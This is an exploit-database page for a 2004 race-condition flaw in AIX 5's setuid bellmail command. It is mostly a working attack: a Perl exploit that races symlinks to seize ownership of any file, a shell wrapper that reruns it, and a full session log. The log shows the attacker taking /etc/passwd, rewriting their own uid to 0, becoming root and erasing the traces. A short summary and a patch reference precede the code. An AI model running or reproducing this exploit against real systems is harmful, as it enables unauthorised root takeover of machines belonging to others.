header-logo
Suggest Exploit
vendor:
by:
watercloud@xfocus.org
N/A
CVSS
N/A
Race condition vulnerability
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Aix5
2004

Race condition vulnerability (BUGTRAQ ID: 8805) of /usr/bin/bellmail command on Aix5

This exploit takes advantage of a race condition vulnerability in the /usr/bin/bellmail command on Aix5. It allows an attacker to change the owner of any file to the current user. The exploit script x_aix5_bellmail.pl is used to perform the exploit. The aim_file parameter specifies the file that the attacker wants to change the owner of. The exploit relies on a race condition, so multiple runs may be needed. The x_bellmail.sh script can assist with using this exploit.

Mitigation:

IBM has provided a patch named "IY25661" to address this vulnerability.
Source

Exploit-DB raw data:

-bash-2.05b$
-bash-2.05b$ cat x_aix5_bellmail.pl
#!/usr/bin/perl
# FileName: x_aix5_bellmail.pl
# Exploit "Race condition vulnerability (BUGTRAQ  ID: 8805)" of /usr/bin/bellmail
#         command on Aix5 to change any file owner to current user.
#
#Usage    : x_aix5_bellmail.pl aim_file
#           aim_file : then file wich you want to chown to you.
#    Note : Maybe you should run more than one to "Race condition".
#           The file named "x_bell.sh" can help you to use this exp.
#           You should type "w" "Enter" then "q"  "Enter" key on keyboard
#          as fast as you can when bellmail prompt "?" appear.
#
# Author  : watercloud@xfocus.org
#     XFOCUS Team    
#     http://www.xfocus.net   (CN)
#     http://www.xfocus.org   (EN)
#
# Date    : 2004-6-6
# Tested  : on  Aix5.1.
# Addition: IBM had offered a patch named "IY25661" for it.
# Announce: use as your owner risk!

$CMD="/usr/bin/bellmail";
$MBOX="$ENV{HOME}/mbox";
$TMPFILE="/tmp/.xbellm.tmp";

$AIM_FILE = shift @ARGV ;
$FORK_NUM = 1000;

die "AIM FILE \"$AIM_FILE\" not exist.\n" if ! -e $AIM_FILE;

unlink $MBOX;
system "echo abc > $TMPFILE";
system "$CMD $ENV{LOGIN} < $TMPFILE";
unlink $TMPFILE;

$ret=`ls -l $AIM_FILE"`;
print "Before: $ret";

if( fork()==0 )
{
        &deamon($FORK_NUM);
        exit 0 ;
}
sleep( (rand()*100)%4);
exec $CMD;

$ret=`ls -l $AIM_FILE"`;
print "Now: $ret";

sub deamon {
        $num = shift || 1;
        for($i=0;$i<$num;$i++) {
                &do_real() if fork()==0;
        }
}
sub do_real {
        if(-e $MBOX) {
                unlink $MBOX ;
                symlink "$AIM_FILE",$MBOX;
        }
        exit 0;
}
#EOF







-bash-2.05b$
-bash-2.05b$ cat x_bellmail.sh
#!/bin/sh
#File:x_bellmail.sh
#The assistant of x_aix5_bellmail.pl
#Author : watercloud@xfocus.org
#Date   :2004-6-6
#

X_BELL_PL="./x_aix5_bellmail.pl"
AIM=$1

if [ $# ne 1 ] ;then
        echo "Need a aim file name as argv."
        exit 1;
fi

if [ ! -e "$1" ];then
        echo "$1 not exist!"
        exit 1
fi
if [ ! -x "$X_BELL_PL" ];then
        echo "can not exec $X_BELL_PL"
        exit 1
fi

ret=`ls -l $AIM`
echo $ret; echo
fuser=`echo $ret |awk '{print $3}'`
while [ "$fuser" != "$LOGIN" ]
do
        $X_BELL_PL $AIM
        ret=`ls -l $AIM`
        echo $ret;echo
        fuser=`echo $ret |awk '{print $3}'`
done
echo $ret; echo
#EOF




-bash-2.05b$ id
uid=201(cloud) gid=1(staff)
-bash-2.05b$
-bash-2.05b$ oslevel
5.1.0.0
-bash-2.05b$ oslevel -r
5100-01
-bash-2.05b$ ls -l /usr/bin/bellmail
-r-sr-sr-x   1 root     mail          30208 Aug 09 2003  /usr/bin/bellmail
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
-bash-2.05b$ cp /etc/passwd /tmp/


-bash-2.05b$ ./x_bellmail.sh /etc/passwd
./x_bellmail.sh[11]: ne: 0403-012 A test command parameter is not valid.
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:49:30 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:49:35 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:49:40 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:49:43 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
w
From cloud Sun Jun  6 08:49:48 2004
abc

? From cloud Sun Jun  6 08:25:20 2004
abc

? w
bellmail: cannot append to /home/cloud/mbox
? w
bellmail: cannot append to /home/cloud/mbox
? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:49:56 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 root security 570 Jun 03 22:59 /etc/passwd

Before: -rw-r--r--   1 root     security        570 Jun 03 22:59 /etc/passwd
From cloud Sun Jun  6 08:50:01 2004
abc

? w
From cloud Sun Jun  6 08:25:20 2004
abc

? q
-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd

-rw-r--r-- 1 cloud staff 570 Jun 03 22:59 /etc/passwd






-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:201:1::/home/cloud:/usr/local/bin/bash



-bash-2.05b$ cat /tmp/passwd |sed 's/cloud:!:201:/cloud:!:0:/' >/etc/passwd


-bash-2.05b$ su cloud
cloud's Password:
3004-502 Cannot get "LOGNAME" variable.
-bash-2.05b$ id
uid=201 gid=1(staff)
-bash-2.05b$ ls -l /etc/passwd
-rw-r--r--   1 201      staff           568 Jun 06 08:56 /etc/passwd
-bash-2.05b$ echo 'test:!:201:1::/home/cloud:/usr/local/bin/bash'  >> /etc/passwd
-bash-2.05b$ cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
snapp:*:177:1:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
imnadm:*:188:188::/home/imnadm:/usr/bin/ksh
cloud:!:0:1::/home/cloud:/usr/local/bin/bash
test:!:201:1::/home/cloud:/usr/local/bin/bash


-bash-2.05b$ su cloud
cloud's Password:
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b# ls -l /etc/passwd
-rw-r--r--   1 test     staff           614 Jun 06 08:58 /etc/passwd
bash-2.05b# cp /tmp/passwd /etc/passwd
bash-2.05b# chown root /tmp/passwd
bash-2.05b# ls -l /tmp/passwd
-rw-r--r--   1 root     staff           570 Jun 06 08:48 /tmp/passwd
bash-2.05b# id
uid=0(root) gid=1(staff)
bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#


# milw0rm.com [2005-05-19]